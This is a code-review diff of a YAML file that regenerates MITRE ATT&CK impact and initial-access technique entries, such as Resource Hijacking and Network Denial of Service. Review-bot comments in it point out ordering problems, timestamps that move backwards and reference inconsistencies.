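Review bot: T1496.004 and T1496.001 are inserted between T1491.001 and T1565, T1496.002 lands after T1491, and the parent T1496 sits further down after T1499, so the technique order in this file is not by ID and every regeneration will scatter siblings across the file. Sorting the technique keys by ID in the generator would keep the T1496 family together and turn insertions like these into clean appends; as a side note, the new sub-techniques carry `x_mitre_attack_spec_version: 3.2.0` while T1491.001 in the context lines at the top of this hunk stays at `2.1.0`.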
@@ -58362,11 +59341,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58389,6 +59367,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58406,9 +59385,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -58434,9 +59414,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -58523,7 +59502,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
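Review bot: T1486's `modified` also regresses, from `2022-11-08T14:00:00.188Z` to `2022-06-16T13:07:10.318Z`; with T1491 and T1491.001 that makes three objects in this diff whose timestamps go backwards while the rest move to October 2024. Please say in the PR which bundle these came from, or regenerate them from the same source as the rest.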
@@ -58547,12 +59526,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58571,7 +59549,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -58588,18 +59565,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
@@ -58623,8 +59595,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58644,33 +59616,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
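Review bot: the rewritten T1496 description drops the seven old citations in favour of a single `(Citation: Sysdig Cryptojacking Proxyjacking 2023)`, and the hunk at `@@ -58718,99 +59682,73 @@` removes the old `external_references` entries, but the diff as shown never adds a matching `source_name: Sysdig Cryptojacking Proxyjacking 2023` entry. Confirm it is present in the new `external_references` list, otherwise the citation has no target.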
@@ -58681,7 +59642,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -58698,8 +59659,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
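Review bot: the two new data sources ('Cloud Service: Cloud Service Modification', 'Application Log: Application Log Content') and the new SaaS platform are not reflected in the x_mitre_detection text just above this hunk, which still only talks about monitoring process resource usage. That is expected if the detection text is copied from upstream unchanged, but if this file is edited by hand the guidance should say which cloud-service or application-log signals justify the added sources.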
@@ -58718,99 +59682,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
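Review bot: the new Sysdig reference description has a space before the period ("Targeting GitLab ."), which should read "Targeting GitLab."; the rest of the T1496 reference replacement is consistent with the citation tags in the new description. In the T1565.002 block the only value changes besides the reorder are modified, x_mitre_attack_spec_version 2.1.0 to 3.2.0, and the FireEye APT38 url moving from content.fireeye.com to a mandiant.com PDF while "Retrieved November 6, 2018" is kept, so the retrieved date now predates the document it points at; consider refreshing it. The spec_version: '2.1' removal matches every other object in this diff.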
@@ -58819,7 +59757,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58845,9 +59783,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58903,55 +59842,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58966,6 +59861,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58978,16 +59877,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
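Review bot: the re-added x_mitre_platforms list for T1498 has five entries (Windows, IaaS, Linux, macOS, Containers) where the list deleted in the earlier hunk of this object had nine (it also had Azure AD, Office 365, SaaS, Google Workspace). Dropping Azure AD, Office 365 and Google Workspace matches the platform consolidation applied to T1566.002 and T1078.001 further down, but SaaS disappears without an Identity Provider or Office Suite replacement, so confirm this matches the upstream bundle rather than a gap in generation. The FS-ISAC url path change (ic3.gov/media/2012 to ic3.gov/Media/PDF/Y2012) is paired with a refreshed retrieved date, which is the right way to do it.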
@@ -59055,11 +59990,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59077,7 +60011,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -59104,7 +60038,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -59154,13 +60088,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
@@ -59228,11 +60161,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
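Review bot: the modified timestamp for T1529 moves backwards (2023-05-09T14:00:00.188Z to 2023-03-22T20:45:22.531Z), and the same happens for T1133 (to 2023-03-30) and T1195.003 (2022-05-24 to 2022-04-28) in later hunks. If the old values were bulk re-stamp dates from an earlier import and the new ones come from the current upstream STIX bundle this is fine, but a downstream consumer that treats modified as monotonic will skip these objects; worth one line in the commit message.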
@@ -59297,13 +60229,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59381,7 +60312,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -59431,11 +60361,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59474,10 +60403,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
